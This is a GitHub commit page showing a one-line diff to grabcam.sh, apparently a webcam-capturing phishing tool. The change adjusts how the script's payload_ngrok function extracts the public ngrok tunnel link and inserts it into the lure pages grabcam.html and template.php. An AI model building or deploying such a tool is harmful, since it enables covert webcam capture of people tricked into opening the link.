Skip to content

Commit e4b1f9c

Browse files
authored
Update grabcam.sh
1 parent f2be2ae commit e4b1f9c

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

grabcam.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -136,7 +136,7 @@ printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Direct link:\e[0m\e[1;77m %s\n' $s
136136

137137
payload_ngrok() {
138138

139-
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
139+
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9A-Za-z.-]*\.ngrok.io")
140140
sed 's+forwarding_link+'$link'+g' grabcam.html > index2.html
141141
sed 's+forwarding_link+'$link'+g' template.php > index.php
142142

0 commit comments

Comments
 (0)